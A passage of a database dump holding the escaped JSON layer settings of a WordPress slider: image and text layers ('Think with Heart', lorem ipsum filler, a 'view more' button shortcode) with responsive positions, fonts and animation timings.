},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"4\":{\"text\":\"Image 3\",\"alias\":\"Cube\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h10-slide2-graphic3.jpg\",\"imageId\":631},\"size\":{\"width\":{\"d\":{\"v\":\"714px\",\"e\":true},\"n\":{\"v\":\"616px\",\"e\":true},\"t\":{\"v\":\"651px\",\"e\":true},\"m\":{\"v\":\"614px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"353px\",\"e\":true},\"n\":{\"v\":\"305px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"303px\",\"e\":true}},\"originalWidth\":714,\"originalHeight\":353,\"aspectRatio\":{\"d\":{\"v\":2.022662889518413553702202989370562136173248291015625},\"n\":{\"v\":2.022662889518413553702202989370562136173248291015625},\"t\":{\"v\":2.022662889518413553702202989370562136173248291015625},\"m\":{\"v\":2.022662889518413553702202989370562136173248291015625}}},\"position\":{\"x\":{\"d\":{\"v\":\"-391px\",\"e\":true},\"n\":{\"v\":\"-212px\",\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"v\":\"-2px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"205px\",\"e\":true},\"n\":{\"v\":\"117px\",\"e\":true},\"t\":{\"v\":\"135px\",\"e\":true},\"m\":{\"v\":\"3px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power1.easeOut\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power1.easeOut\",\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"5\":{\"text\":\"

Think with<\\/span> Heart<\\/h1>\",\"alias\":\"Think with Heart\",\"uid\":5,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"398px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"76px\",\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-450px\",\"e\":true},\"n\":{\"v\":\"-242px\",\"e\":true},\"t\":{\"v\":\"100px\",\"e\":true},\"m\":{\"v\":\"54px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"93px\",\"e\":true},\"n\":{\"v\":\"2px\",\"e\":true},\"t\":{\"v\":\"370px\",\"e\":true},\"m\":{\"v\":\"73px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"10px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"14px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"},\"6\":{\"text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\\n Maecenas interdum eu lacus dapibus finibus. Pellentesque vehicula, metus ut tincidunt euismod, arcu quam lobortis nulla, ut pretium nisi sem sed.\",\"alias\":\"Lorem ipsum dolor si...\",\"uid\":6,\"size\":{\"width\":{\"d\":{\"v\":\"620px\",\"e\":true},\"n\":{\"v\":\"540px\",\"e\":true},\"t\":{\"v\":\"558px\",\"e\":true},\"m\":{\"v\":\"371px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"76px\",\"e\":true},\"n\":{\"v\":\"78px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"126px\",\"e\":true}},\"originalWidth\":\"620px\",\"originalHeight\":\"76px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-377px\",\"e\":true},\"n\":{\"v\":\"-210px\",\"e\":true},\"t\":{\"v\":\"104px\",\"e\":true},\"m\":{\"v\":\"-464px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"199px\",\"e\":true},\"n\":{\"v\":\"110px\",\"e\":true},\"t\":{\"v\":\"260px\",\"e\":true},\"m\":{\"v\":\"463px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"25px\",\"e\":true},\"m\":{\"v\":\"25px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"text\"},\"7\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button size=\",\"uid\":7,\"size\":{\"width\":{\"d\":{\"v\":\"588px\",\"e\":true},\"n\":{\"v\":\"464px\",\"e\":true},\"t\":{\"v\":\"588px\",\"e\":true},\"m\":{\"v\":\"411px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"588px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-392px\",\"e\":true},\"n\":{\"v\":\"-247px\",\"e\":true},\"t\":{\"v\":\"105px\",\"e\":true},\"m\":{\"v\":\"64px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"287px\",\"e\":true},\"n\":{\"v\":\"197px\",\"e\":true},\"t\":{\"v\":\"180px\",\"e\":true},\"m\":{\"v\":\"210px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":2000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1000,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":2000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\",\"e\":true},\"m\":{\"v\":\"#000000\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(20,8,3,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"position\":\"left 